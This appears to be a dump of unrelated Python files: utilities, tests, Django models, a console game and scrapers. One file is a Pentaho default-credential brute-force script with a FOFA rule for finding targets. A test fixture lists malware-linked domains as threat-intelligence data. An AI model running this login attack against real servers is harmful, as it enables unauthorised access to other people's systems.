    """Map a '+'-separated style spec (e.g. 'bold+underline') to SGR codes."""
    codes = []
    if style:
        for st in style.split('+'):
            if st in STYLES:
                codes.append(f'{(1 + STYLES.index(st))}')
            else:
                # BUG FIX: the f prefix was missing here as well.
                raise Exception(f'Invalid style "{st}"')
    return codes


def color(s, fg=None, bg=None, style=None):
    """Wrap `s` in ANSI SGR escapes for the given fg/bg color and style.

    Returns `s` unchanged when no attribute is requested.
    """
    sgr = _ansi_color(fg, 30, 38) + _ansi_color(bg, 40, 48)
    sgr += _style_codes(style)
    if sgr:
        return f"\x1b[{';'.join(sgr)}m{s}\x1b[0m"
    return s


def strip_color(s):
    """Remove ANSI escape sequences from `s`."""
    return re.sub(r'\x1b\[.+?m', '', s)


# Foreground shortcuts
black = partial(color, fg='black')
red = partial(color, fg='red')
green = partial(color, fg='green')
yellow = partial(color, fg='yellow')
blue = partial(color, fg='blue')
magenta = partial(color, fg='magenta')
cyan = partial(color, fg='cyan')
white = partial(color, fg='white')

# Style shortcuts
bold = partial(color, style='bold')
faint = partial(color, style='faint')
italic = partial(color, style='italic')
underline = partial(color, style='underline')
blink = partial(color, style='blink')
blink2 = partial(color, style='blink2')
negative = partial(color, style='negative')
concealed = partial(color, style='concealed')
crossed = partial(color, style='crossed')
nilq/baby-python
python
#!/usr/bin/env python

# Minimal smoke-test script: emits a single greeting to stdout.
print("hi from Python 3")
nilq/baby-python
python
"""Background job to perform a DNS lookup and insert into or update in the db. Attributes: DNS_SERVERS: A list of strs representing which DNS servers to use DNS_BLOCKLIST: A str representing the blocklist to send a DNS lookup to """ import dns.resolver from models import IPDetails, ResponseCode # Spamhaus will not work with Google's public DNS servers # https://www.spamhaus.org/faq/section/DNSBL%20Usage#261 DNS_SERVERS = ["208.67.222.222"] # OpenDNS DNS_BLOCKLIST = "zen.spamhaus.org" def upsert_ip_details(ip_address): """Insert or update an IPDetails record in the db. Args: ip_address: A str representing the record in the db to insert or update """ response_codes = dns_lookup(ip_address) ip_details = IPDetails.query.filter_by(ip_address=ip_address).first() if ip_details is None: ip_details = IPDetails( response_codes=response_codes, ip_address=ip_address ) ip_details.insert() else: ip_details.response_codes = response_codes ip_details.update() def dns_lookup(ip_address): """Perform a DNS lookup of an IP address to a blocklist. Args: ip_address: A str representing the ip address to perform a DNS lookup against a blocklist Returns: response_codes: A list of ResponseCode objects representing the returned response codes from the DNS lookup against a blocklist """ ip_address = ip_address.split(".") if len(ip_address) != 4 or not all(num.isnumeric() for num in ip_address): raise TypeError("Incorrect format for IPv4 IP Address") ip_address = ".".join(reversed(ip_address)) response_codes = [] dns.resolver.get_default_resolver().nameservers = DNS_SERVERS try: answer = dns.resolver.resolve(f"{ip_address}.{DNS_BLOCKLIST}") except dns.resolver.NXDOMAIN: return response_codes for data in answer: response_code = ResponseCode.query.filter_by( response_code=str(data) ).first() if response_code is None: response_code = ResponseCode(response_code=str(data)) response_code.insert() response_codes.append(response_code) return response_codes
nilq/baby-python
python
from scrapy import cmdline

if __name__ == '__main__':
    # Other spiders in this project -- enable one at a time:
    # cmdline.execute('scrapy crawl xinFang'.split())
    # cmdline.execute('scrapy crawl erShouFang'.split())
    # Launch the rental-listings spider.
    cmdline.execute('scrapy crawl zuFang'.split())
nilq/baby-python
python
from .build_model import add_weights, build_model
nilq/baby-python
python
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_

import requests

from Config.config_requests import ua

requests.packages.urllib3.disable_warnings()

# Script metadata
######################################################
NAME = 'pentaho_bruteforce'
AUTHOR = "Trans"
REMARK = 'pentaho密码爆破'
FOFA_RULE = 'app="pentaho"'
######################################################


def poc(target):
    """Try Pentaho's default credentials against `target`.

    Args:
        target: base URL of the host, e.g. "http://host:8080".

    Returns:
        A dict with target/username/password for the first credential pair
        that logs in successfully, or None when none of them work.
    """
    result = {}
    url = target + "/pentaho"
    refer = url + "/Login"
    url += "/j_spring_security_check"
    login_headers = {
        "User-Agent": ua,
        "Referer": refer,
    }
    # Default out-of-the-box Pentaho accounts.
    webapp_usernames = {
        'admin': 'password',
        'joe': 'password',
        'suzy': 'password',
        'tiffany': 'password',
        'pat': 'password',
    }
    for user, password in webapp_usernames.items():
        login_data = {"j_username": user, "j_password": password, "locale": "en_US"}
        response = requests.post(url, headers=login_headers, data=login_data,
                                 verify=False, timeout=5)
        # A successful login redirects to the /Home perspective.
        if '/Home' in response.url:
            print('Logging in as ' + user + ' / ' + password)
            result['target'] = target
            result['username'] = user
            result['password'] = password
            return result
    # No default credential worked (was an implicit None before; made
    # explicit, and the unused `path_store` local was removed).
    return None


if __name__ == '__main__':
    poc("http://127.0.0.1:3312")
nilq/baby-python
python
# Copyright (c) 2019, Palo Alto Networks
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

# Author: Giselle Serate <gserate@paloaltonetworks.com>

'''
Palo Alto Networks testcases.py

Defines parameters for the test.

Include this file; do not run it directly.

This software is provided without support, warranty, or guarantee.
Use at your own risk.
'''


class ParseTest():
    """Fixture parameters for the 3026-3536 release-notes parse test."""

    def __init__(self):
        # Static version notes metadata.
        self.version = '3026-3536'
        self.version_date = '2019-07-01T04:00:52-07:00'

        # If we process this much or more, we pass.
        self.percent_processed = 0.5

        # Domains expected in the database, grouped by action and kept in
        # release-note order ("added" entries first, then "removed").
        added = [
            'None:gacyqob.com',
            'Backdoor.simda:gahyraw.com',
            'None:pupycag.com',
            'PWS.simda:qetyhyg.com',
            'Backdoor.simda:vojykom.com',
            'Backdoor.simda:vowygem.com',
            'None:vowyzuk.com',
            'Worm.pykspa:agadss.biz',
            'Worm.pykspa:qgasocuiwcymao.info',
            'Worm.pykspa:ygsink.info',
            'Worm.ainslot:ryan12345.no-ip.biz',
            'TrojanDownloader.upatre:hngdecor.com',
            'TrojanDownloader.upatre:okeanbg.com',
            'TrojanDownloader.upatre:gert-hof.de',
            'Packed.fe:spaines.pw',
            'None:recdataoneveter.cc',
        ]
        removed = [
            'Backdoor.vawtrak:mbbllmv.eu',
            'None:mfkxyucmxwhw.com',
            'Worm.pykspa:kegbceiq.info',
            'Virus.gippers:microsoft.mypicture.info',
            'DDoS.nitol:a7677767.vicp.net',
            'Worm.pykspa:yeuawkuiwcymao.info',
            'None:zief.pl',
            'Virus.palevogen:.banjalucke-ljepotice.ru',
            'VirTool.ceeinject:digitalmind.cn',
            'Virus.virut:irc.zief.pl',
            'Trojan.dorv:lyvyxor.com',
            'Virus.sality:sungkhomwit.com',
            'Virus.sality:asesoriaenexposicion.com',
            'TrojanSpy.nivdort:doubledistant.net',
            'None:extsc.3322.org',
            'Virus.sality:solitaireinfo.com',
        ]
        self.cases = ([{'raw': raw, 'action': 'added'} for raw in added]
                      + [{'raw': raw, 'action': 'removed'} for raw in removed])
python
import pycountry

from matcher.server.main.elastic_utils import get_analyzers, get_char_filters, get_filters, get_index_name, get_mappings
from matcher.server.main.logger import get_logger
from matcher.server.main.my_elastic import MyElastic

SOURCE = 'country'

logger = get_logger(__name__)


def download_country_data():
    """Return the raw pycountry country records as plain field dicts."""
    return [c.__dict__['_fields'] for c in list(pycountry.countries)]


def transform_country_data(raw_data):
    """Normalize raw pycountry records into matcher-ready country dicts.

    Each output dict has lowercase 'alpha2', a list 'alpha3' (plus 'uk' for
    Great Britain), a deduplicated 'name' list (official/common names plus
    colloquial aliases), and, when available, subdivision names/codes.
    """
    subdivision_name, subdivision_code = {}, {}
    for subdivision in pycountry.subdivisions:
        alpha2 = subdivision.country_code.lower()
        if alpha2 not in subdivision_name:
            subdivision_name[alpha2] = []
        if alpha2 not in subdivision_code:
            subdivision_code[alpha2] = []
        subdivision_name[alpha2].append(subdivision.name)
        # Only US state codes are indexed (strip the 'US-' prefix).
        if alpha2 == 'us':
            subdivision_code[alpha2].append(subdivision.code[3:])
        # 'northern ireland' is not a pycountry subdivision name; add it.
        if alpha2 == 'gb':
            subdivision_name[alpha2].append('northern ireland')

    # Colloquial aliases not present in the ISO names.
    aliases = {
        'bn': ['brunei'],
        'ci': ['ivory coast'],
        'cv': ['cape verde'],
        'cz': ['czech'],
        'de': ['deutschland'],
        'gb': ['uk'],
        'ir': ['iran'],
        'kp': ['north korea'],
        'kr': ['south korea', 'republic of korea'],
        'la': ['laos'],
        'mo': ['macau'],
        'ru': ['russia'],
        'sy': ['syria'],
        'tw': ['taiwan'],
        'us': ['usa'],
        'vn': ['vietnam'],
    }

    countries = []
    for raw in raw_data:
        alpha2 = raw['alpha_2'].lower()
        alpha3 = raw['alpha_3'].lower()
        country = {'alpha2': alpha2, 'alpha3': [alpha3]}
        if alpha2 == 'gb':
            country['alpha3'].append('uk')
        names = [raw[field] for field in ('name', 'official_name', 'common_name')
                 if field in raw]
        names += aliases.get(alpha2, [])
        country['name'] = list(set(names))
        if alpha2 in subdivision_name:
            country['subdivision_name'] = list(set(subdivision_name[alpha2]))
            country['subdivision_code'] = list(set(subdivision_code[alpha2]))
        countries.append(country)
    return countries


def load_country(index_prefix: str = 'matcher') -> dict:
    """Create the per-criterion country indices and bulk-load match queries.

    Returns a dict mapping index name -> number of distinct criterion values
    loaded into it.
    """
    es = MyElastic()
    settings = {
        'analysis': {
            'char_filter': get_char_filters(),
            'filter': get_filters(),
            'analyzer': get_analyzers(),
        }
    }
    analyzers = {
        'name': 'name_analyzer',
        'subdivision_name': 'light',
        'subdivision_code': 'light',
        'alpha3': 'light',
    }
    criteria = list(analyzers.keys())
    es_data = {}
    for criterion in criteria:
        index = get_index_name(index_name=criterion, source=SOURCE, index_prefix=index_prefix)
        es.create_index(index=index, mappings=get_mappings(analyzers[criterion]), settings=settings)
        es_data[criterion] = {}

    countries = transform_country_data(download_country_data())

    # Collect, per criterion, the alpha2 codes associated with each value.
    for country in countries:
        for criterion in criteria:
            criterion_values = country.get(criterion)
            # BUG FIX: the None check previously ran AFTER wrapping the value
            # in a list, so it could never fire and None was stored as a key;
            # check before wrapping so missing criteria are skipped (and the
            # debug log actually triggers).
            if criterion_values is None:
                logger.debug(f'This element {country} has no {criterion}')
                continue
            if not isinstance(criterion_values, list):
                criterion_values = [criterion_values]
            for criterion_value in criterion_values:
                if criterion_value not in es_data[criterion]:
                    es_data[criterion][criterion_value] = []
                es_data[criterion][criterion_value].append({'country_alpha2': country['alpha2']})

    # Bulk insert data into ES.
    actions = []
    results = {}
    for criterion in es_data:
        index = get_index_name(index_name=criterion, source=SOURCE, index_prefix=index_prefix)
        analyzer = analyzers[criterion]
        results[index] = len(es_data[criterion])
        for criterion_value in es_data[criterion]:
            if criterion_value:
                action = {
                    '_index': index,
                    'country_alpha2': list(set(
                        [k['country_alpha2'] for k in es_data[criterion][criterion_value]])),
                    'query': {
                        'match_phrase': {
                            'content': {
                                'query': criterion_value,
                                'analyzer': analyzer,
                                'slop': 2,
                            }
                        }
                    },
                }
                actions.append(action)
    es.parallel_bulk(actions=actions)
    return results
python
#--------------# # Look Away! # # By: Santo C. # #--------------# # Created October 26, 2006 (c) Santo C. # Import the modules needed. import random from time import sleep # Rules Document Rules = """========== Rules of the game: ------------------ Standing in front of you is your game host. He will point in one direction, and you have to face the other direction by selecting the direction. For example, he will point left, which means you will have to look right, and it's done at the split of the moment, so you never know... Bonne Chance! ========== """ # # -The Game Begins!- # print """-------------------------------------- +--------------+ | Look Away! | | By: Santo C. | +--------------+ How to play: Look the other way from the game host! -------------------------------------- Look Away! (c) 2006 Santo C. -------------------------------------- """ #Game Loop while True: print "-=MAIN MENU=-" print "1) Game Rules" print "2) Play" print "3) Quit Game" SLCT = raw_input("Select Choice: ") print if SLCT == '1': # List rules here. print Rules elif SLCT == '2': print "Alright, let's play!" print sleep(2) print "(The game host approaches you for the game...)" print sleep(2) print "Host: Hello there! Let's play some Look Away!" print sleep(2) print "Host: Right... When you're ready..." print "... You can look to the Left, or the Right, or quit at any time." print sleep(2) while True: print "(Which way will you look?)" Direction = raw_input('(1) Left / (2) Right / (3) Quit : ') print if Direction == '1': sleep(2) print "(You will look to the left...)" print sleep(2) print "Host: Ready? And..." print sleep(2) HostDirection = str(random.randrange(1,3)) print "GO!" print "You: ", '<=' if HostDirection == '1': print "Host:", '<=' elif HostDirection == '2': print "Host:", '=>' print sleep(2) if HostDirection != Direction: print "Host: Good, you looked the other way! You win!" print elif HostDirection == Direction: print "Host: Hah, you looked my direction! You lose!" 
print elif Direction == '2': sleep(2) print "(You will look to the right...)" print sleep(2) print "Host: Ready? And..." print sleep(2) HostDirection = str(random.randrange(1,3)) print "GO!" print "You: ", '=>' if HostDirection == '1': print "Host:", '<=' elif HostDirection == '2': print "Host:", '=>' print sleep(2) if HostDirection != Direction: print "Host: Good, you looked the other way! You win!" print elif HostDirection == Direction: print "Host: Hah, you looked my direction! You lose!" print sleep(2) elif Direction == '3': break else: print print "Please select an option!" print elif SLCT == '3': print "Alright then. About face, and goodbye! :)" sleep(2) break else: print "Please select an option!" print
nilq/baby-python
python
from django.db import models


# Model to store incoming unpaid cheque details.
class UnpaidCheque(models.Model):
    """One incoming unpaid-cheque record as parsed from the raw feed."""

    raw_string = models.CharField(max_length=100)
    voucher_code = models.CharField(max_length=3)
    cheque_number = models.CharField(max_length=100)
    reason_code = models.CharField(max_length=3)
    cheque_amount = models.DecimalField(max_digits=9, decimal_places=2)
    cheque_value_date = models.DateField()
    ft_ref = models.CharField(max_length=100, blank=True, null=True)
    logged_at = models.DateTimeField(auto_now_add=True)
    is_unpaid = models.BooleanField(default=False)
    unpaid_value_date = models.DateField(blank=True, null=True)
    # NOTE(review): plain char field here, while Charge.cc_record is a FK
    # back to this model — presumably the core-banking record id; confirm.
    cc_record = models.CharField(max_length=100, blank=True, null=True)
    unpay_success_indicator = models.CharField(max_length=50, blank=True, null=True)
    unpay_error_message = models.CharField(max_length=100, blank=True, null=True)
    cheque_account = models.CharField(max_length=100, blank=True, null=True)
    owner = models.ForeignKey('auth.User', related_name='unpaid_cheques',
                              on_delete=models.CASCADE)

    def __str__(self):
        # ft_ref is nullable; __str__ must return a str, so fall back to ''
        # (returning None raises TypeError in the admin and templates).
        return self.ft_ref or ''

    class Meta:
        ordering = ['logged_at']


# Model to store charge details.
class Charge(models.Model):
    """A charge raised against an unpaid cheque (``cc_record``)."""

    charge_id = models.CharField(max_length=100)
    charge_account = models.CharField(max_length=100)
    charge_amount = models.DecimalField(max_digits=9, decimal_places=2)
    charge_value_date = models.DateField()
    charge_success_indicator = models.CharField(max_length=50, blank=True, null=True)
    ofs_id = models.CharField(max_length=100, blank=True, null=True)
    ft_ref = models.CharField(max_length=100, blank=True, null=True)
    is_collected = models.BooleanField(default=False)
    charge_error_message = models.CharField(max_length=100, blank=True, null=True)
    cc_record = models.ForeignKey('UnpaidCheque', related_name='charges',
                                  on_delete=models.CASCADE)
    owner = models.ForeignKey('auth.User', related_name='charges',
                              on_delete=models.CASCADE)

    def __str__(self):
        # charge_id is non-nullable, so this is always a str.
        return self.charge_id

    class Meta:
        ordering = ['charge_id']
nilq/baby-python
python
# Copyright 2019 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for reverb.trajectory_writer."""

from typing import Optional
from unittest import mock

from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from reverb import client as client_lib
from reverb import pybind
from reverb import server as server_lib
from reverb import trajectory_writer
import tree


class FakeWeakCellRef:
  """Stand-in for the C++ weak cell reference returned by the writer."""

  def __init__(self, data):
    self.data = data

  @property
  def shape(self):
    return np.asarray(self.data).shape

  @property
  def dtype(self):
    return np.asarray(self.data).dtype


def extract_data(column: trajectory_writer._ColumnHistory):
  """Returns the raw data behind each (possibly None) ref in `column`."""
  return [ref.data if ref else None for ref in column]


def _mock_append(x):
  """Mimics the C++ writer's Append: wrap each non-None value in a ref."""
  return [FakeWeakCellRef(y) if y is not None else None for y in x]


class TrajectoryWriterTest(parameterized.TestCase):
  """Unit tests for TrajectoryWriter against a mocked C++ writer."""

  def setUp(self):
    super().setUp()

    self.cpp_writer_mock = mock.Mock()
    self.cpp_writer_mock.Append.side_effect = _mock_append
    self.cpp_writer_mock.AppendPartial.side_effect = _mock_append

    self.writer = trajectory_writer.TrajectoryWriter(self.cpp_writer_mock)

  def test_history_require_append_to_be_called_before(self):
    with self.assertRaises(RuntimeError):
      _ = self.writer.history

  def test_history_contains_references_when_data_flat(self):
    self.writer.append(0)
    self.writer.append(1)
    self.writer.append(2)

    history = tree.map_structure(extract_data, self.writer.history)
    self.assertListEqual(history, [0, 1, 2])

  def test_history_contains_structured_references(self):
    self.writer.append({'x': 1, 'y': 100})
    self.writer.append({'x': 2, 'y': 101})
    self.writer.append({'x': 3, 'y': 102})

    history = tree.map_structure(extract_data, self.writer.history)
    self.assertDictEqual(history, {'x': [1, 2, 3], 'y': [100, 101, 102]})

  def test_history_structure_evolves_with_data(self):
    self.writer.append({'x': 1, 'z': 2})
    first = tree.map_structure(extract_data, self.writer.history)
    self.assertDictEqual(first, {'x': [1], 'z': [2]})

    self.writer.append({'z': 3, 'y': 4})
    second = tree.map_structure(extract_data, self.writer.history)
    self.assertDictEqual(second, {
        'x': [1, None],
        'z': [2, 3],
        'y': [None, 4],
    })

    self.writer.append({'w': 5})
    third = tree.map_structure(extract_data, self.writer.history)
    self.assertDictEqual(third, {
        'x': [1, None, None],
        'z': [2, 3, None],
        'y': [None, 4, None],
        'w': [None, None, 5],
    })

    self.writer.append({'x': 6, 'w': 7})
    forth = tree.map_structure(extract_data, self.writer.history)
    self.assertDictEqual(forth, {
        'x': [1, None, None, 6],
        'z': [2, 3, None, None],
        'y': [None, 4, None, None],
        'w': [None, None, 5, 7],
    })

  @parameterized.named_parameters(
      ('tuple', (0,), (0, 1)),
      ('dict', {'x': 0}, {'x': 0, 'y': 1}),
      ('list', [0], [0, 1]),
  )
  def test_append_with_more_fields(self, first_step_data, second_step_data):
    self.writer.append(first_step_data)
    self.writer.append(second_step_data)

  def test_append_returns_same_structure_as_data(self):
    first_step_data = {'x': 1, 'y': 2}
    first_step_ref = self.writer.append(first_step_data)
    tree.assert_same_structure(first_step_data, first_step_ref)

    # Check that this holds true even if the data structure changes between
    # steps.
    second_step_data = {'y': 2, 'z': 3}
    second_step_ref = self.writer.append(second_step_data)
    tree.assert_same_structure(second_step_data, second_step_ref)

  def test_append_forwards_flat_data_to_cpp_writer(self):
    data = {'x': 1, 'y': 2}
    self.writer.append(data)
    self.cpp_writer_mock.Append.assert_called_with(tree.flatten(data))

  def test_partial_append_appends_to_the_same_step(self):
    # Create a first step and keep it open.
    self.writer.append({'x': 1, 'z': 2}, partial_step=True)
    first = tree.map_structure(extract_data, self.writer.history)
    self.assertDictEqual(first, {'x': [1], 'z': [2]})

    # Append to the same step and keep it open.
    self.writer.append({'y': 4}, partial_step=True)
    second = tree.map_structure(extract_data, self.writer.history)
    self.assertDictEqual(second, {
        'x': [1],
        'z': [2],
        'y': [4],
    })

    # Append to the same step and close it.
    self.writer.append({'w': 5})
    third = tree.map_structure(extract_data, self.writer.history)
    self.assertDictEqual(third, {
        'x': [1],
        'z': [2],
        'y': [4],
        'w': [5],
    })

    # Append to a new step.
    self.writer.append({'w': 6})
    forth = tree.map_structure(extract_data, self.writer.history)
    self.assertDictEqual(forth, {
        'x': [1, None],
        'z': [2, None],
        'y': [4, None],
        'w': [5, 6],
    })

  def test_columns_must_not_appear_more_than_once_in_the_same_step(self):
    # Create a first step and keep it open.
    self.writer.append({'x': 1, 'z': 2}, partial_step=True)

    # Add another unseen column alongside an existing column with a None value.
    self.writer.append({'x': None, 'y': 3}, partial_step=True)

    # Provide a value for a field that has already been set in this step.
    with self.assertRaisesRegex(
        ValueError,
        r'Field \(\'x\',\) has already been set in the active step by previous '
        r'\(partial\) append call and thus must be omitted or set to None but '
        r'got: 4'):
      self.writer.append({'x': 4})

  def test_create_item_checks_type_of_leaves(self):
    first = self.writer.append({'x': 3, 'y': 2})
    second = self.writer.append({'x': 3, 'y': 2})

    # History automatically transforms data and thus should be valid.
    self.writer.create_item('table', 1.0, {
        'x': self.writer.history['x'][0],  # Just one step.
        'y': self.writer.history['y'][:],  # Two steps.
    })

    # Columns can be constructed explicitly.
    self.writer.create_item('table', 1.0, {
        'x': trajectory_writer.TrajectoryColumn([first['x']]),
        'y': trajectory_writer.TrajectoryColumn([first['y'], second['y']])
    })

    # But all leaves must be TrajectoryColumn.
    with self.assertRaises(TypeError):
      self.writer.create_item('table', 1.0, {
          'x': trajectory_writer.TrajectoryColumn([first['x']]),
          'y': first['y'],
      })

  def test_flush_checks_block_until_num_items(self):
    # NOTE: method name fixed from `..._num_itmes` (typo).
    self.writer.flush(0)
    self.writer.flush(1)
    with self.assertRaises(ValueError):
      self.writer.flush(-1)

  def test_configure_uses_auto_tune_when_max_chunk_length_not_set(self):
    self.writer.append({'x': 3, 'y': 2})
    self.writer.configure(('x',), num_keep_alive_refs=2, max_chunk_length=None)
    self.cpp_writer_mock.ConfigureChunker.assert_called_with(
        0,
        pybind.AutoTunedChunkerOptions(
            num_keep_alive_refs=2, throughput_weight=1.0))

  def test_configure_seen_column(self):
    self.writer.append({'x': 3, 'y': 2})
    self.writer.configure(('x',), num_keep_alive_refs=2, max_chunk_length=1)
    self.cpp_writer_mock.ConfigureChunker.assert_called_with(
        0,
        pybind.ConstantChunkerOptions(
            num_keep_alive_refs=2, max_chunk_length=1))

  def test_configure_unseen_column(self):
    self.writer.append({'x': 3, 'y': 2})
    self.writer.configure(('z',), num_keep_alive_refs=2, max_chunk_length=1)

    # The configure call should be delayed until the column has been observed.
    self.cpp_writer_mock.ConfigureChunker.assert_not_called()

    # Still not seen.
    self.writer.append({'a': 4})
    self.cpp_writer_mock.ConfigureChunker.assert_not_called()

    self.writer.append({'z': 5})
    self.cpp_writer_mock.ConfigureChunker.assert_called_with(
        3,
        pybind.ConstantChunkerOptions(
            num_keep_alive_refs=2, max_chunk_length=1))

  @parameterized.parameters(
      (1, None, True),
      (0, None, False),
      (-1, None, False),
      (1, 1, True),
      (1, 0, False),
      (1, -1, False),
      (5, 5, True),
      (4, 5, False),
  )
  def test_configure_validates_params(self, num_keep_alive_refs: int,
                                      max_chunk_length: Optional[int],
                                      valid: bool):
    if valid:
      self.writer.configure(('a',),
                            num_keep_alive_refs=num_keep_alive_refs,
                            max_chunk_length=max_chunk_length)
    else:
      with self.assertRaises(ValueError):
        self.writer.configure(('a',),
                              num_keep_alive_refs=num_keep_alive_refs,
                              max_chunk_length=max_chunk_length)

  def test_episode_steps(self):
    for _ in range(10):
      # Every episode, including the first, should start at zero.
      self.assertEqual(self.writer.episode_steps, 0)

      for i in range(1, 21):
        self.writer.append({'x': 3, 'y': 2})

        # Step count should increment with each append call.
        self.assertEqual(self.writer.episode_steps, i)

      # Ending the episode should reset the step count to zero.
      self.writer.end_episode()

  def test_episode_steps_partial_step(self):
    for _ in range(3):
      # Every episode, including the first, should start at zero.
      self.assertEqual(self.writer.episode_steps, 0)

      for i in range(1, 4):
        self.writer.append({'x': 3}, partial_step=True)

        # Step count should not increment on partial append calls.
        self.assertEqual(self.writer.episode_steps, i - 1)

        self.writer.append({'y': 2})

        # Step count should increment after the unqualified append call.
        self.assertEqual(self.writer.episode_steps, i)

      # Ending the episode should reset the step count to zero.
      self.writer.end_episode()


class TrajectoryColumnTest(parameterized.TestCase):
  """Tests for TrajectoryColumn against a real (local) reverb server."""

  @classmethod
  def setUpClass(cls):
    super().setUpClass()
    cls._server = server_lib.Server([server_lib.Table.queue('queue', 100)])

  def setUp(self):
    super().setUp()
    self.client = client_lib.Client(f'localhost:{self._server.port}')

  @classmethod
  def tearDownClass(cls):
    super().tearDownClass()
    cls._server.stop()

  def test_numpy(self):
    writer = self.client.trajectory_writer(num_keep_alive_refs=10)

    for i in range(10):
      # np.float was a removed alias of the builtin float (NumPy 1.24+);
      # use np.float64 explicitly.
      writer.append({'a': i, 'b': np.ones([3, 3], np.float64) * i})

      np.testing.assert_array_equal(writer.history['a'][:].numpy(),
                                    np.arange(i + 1, dtype=np.int64))

      np.testing.assert_array_equal(
          writer.history['b'][:].numpy(),
          np.stack([np.ones([3, 3], np.float64) * x for x in range(i + 1)]))

  def test_numpy_squeeze(self):
    writer = self.client.trajectory_writer(num_keep_alive_refs=10)

    for i in range(10):
      writer.append({'a': i})
      self.assertEqual(writer.history['a'][-1].numpy(), i)

  def test_validates_squeeze(self):
    # Exactly one is valid.
    trajectory_writer.TrajectoryColumn([FakeWeakCellRef(1)], squeeze=True)

    # Zero is not fine.
    with self.assertRaises(ValueError):
      trajectory_writer.TrajectoryColumn([], squeeze=True)

    # Neither is two (or more).
    with self.assertRaises(ValueError):
      trajectory_writer.TrajectoryColumn(
          [FakeWeakCellRef(1), FakeWeakCellRef(2)], squeeze=True)

  def test_len(self):
    for i in range(1, 10):
      column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(1)] * i)
      self.assertLen(column, i)

  def test_none_raises(self):
    with self.assertRaisesRegex(ValueError, r'cannot contain any None'):
      trajectory_writer.TrajectoryColumn([None])

    with self.assertRaisesRegex(ValueError, r'cannot contain any None'):
      trajectory_writer.TrajectoryColumn([FakeWeakCellRef(1), None])

  @parameterized.named_parameters(
      ('int', 0),
      ('float', 1.0),
      ('bool', True),
      ('np ()', np.empty(())),
      ('np (1)', np.empty((1))),
      ('np (1, 1)', np.empty((1, 1))),
      ('np (3, 4, 2)', np.empty((3, 4, 2))),
  )
  def test_shape(self, data):
    expected_shape = np.asarray(data).shape

    for i in range(1, 10):
      column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(data)] * i)
      self.assertEqual(column.shape, (i, *expected_shape))

  def test_shape_squeezed(self):
    expected_shape = (2, 5)
    data = np.arange(10).reshape(*expected_shape)
    column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(data)],
                                                squeeze=True)
    self.assertEqual(column.shape, expected_shape)

  @parameterized.named_parameters(
      ('int', 0),
      ('float', 1.0),
      ('bool', True),
      ('np_float16', np.empty(shape=(), dtype=np.float16)),
      ('np_float32', np.empty(shape=(), dtype=np.float32)),
      ('np_float64', np.empty(shape=(), dtype=np.float64)),
      ('np_int8', np.empty(shape=(), dtype=np.int8)),
      ('np_int16', np.empty(shape=(), dtype=np.int16)),
      ('np_int32', np.empty(shape=(), dtype=np.int32)),
      ('np_int64', np.empty(shape=(), dtype=np.int64)),
      ('np_uint8', np.empty(shape=(), dtype=np.uint8)),
      ('np_uint16', np.empty(shape=(), dtype=np.uint16)),
      ('np_uint32', np.empty(shape=(), dtype=np.uint32)),
      ('np_uint64', np.empty(shape=(), dtype=np.uint64)),
      ('np_complex64', np.empty(shape=(), dtype=np.complex64)),
      ('np_complex128', np.empty(shape=(), dtype=np.complex128)),
      # np.bool / np.object were removed aliases of the builtins (NumPy
      # 1.24+); use the scalar types np.bool_ / np.object_ instead.
      ('np_bool', np.empty(shape=(), dtype=np.bool_)),
      ('np_object', np.empty(shape=(), dtype=np.object_)),
  )
  def test_dtype(self, data):
    expected_dtype = np.asarray(data).dtype
    column = trajectory_writer.TrajectoryColumn([FakeWeakCellRef(data)])
    self.assertEqual(column.dtype, expected_dtype)


if __name__ == '__main__':
  absltest.main()
nilq/baby-python
python
from django.contrib import admin

# Explicit import instead of the original wildcard import
# (`from activities.models import *`); Activity is the only name used.
from activities.models import Activity

# Register your models here.
admin.site.register(Activity)
nilq/baby-python
python
from django.contrib import admin

from .models import GoogleAuthUser


@admin.register(GoogleAuthUser)
class GoogleAuthUserOption(admin.ModelAdmin):
    """Admin options for GoogleAuthUser records."""

    # Columns shown on the changelist page.
    list_display = ('user', 'refresh_token')
    # Fields searched by the admin search box.
    search_fields = ('user',)
nilq/baby-python
python
#!/usr/bin/env python # encoding: utf-8 # # Copyright (c) 2008 Doug Hellmann All rights reserved. # """Translate a glob-style pattern to a regular expression. """ __version__ = "$Id$" #end_pymotw_header import fnmatch pattern = 'fnmatch_*.py' print 'Pattern :', pattern print 'Regex :', fnmatch.translate(pattern)
nilq/baby-python
python
#!/usr/bin/env python

from icecube import icetray, dataclasses


def ConvertToLinearizedMCTree(frame):
    """Replace the frame's I3MCTree with an I3LinearizedMCTree in place.

    Conversion failures are logged and the original tree is kept.
    Always returns True so the frame continues through the tray.
    """
    if 'I3MCTree' in frame:
        try:
            tree = dataclasses.I3LinearizedMCTree(frame['I3MCTree'])
        except Exception:
            # Bug fix: the module is imported as `icetray`, not `icecube`;
            # `icecube.icetray.logging...` raised NameError. Also narrowed the
            # bare `except:` so KeyboardInterrupt/SystemExit are not swallowed.
            icetray.logging.log_error('cannot convert to I3LinearizedMCTree')
        else:
            del frame['I3MCTree']
            frame['I3MCTree'] = tree
    return True


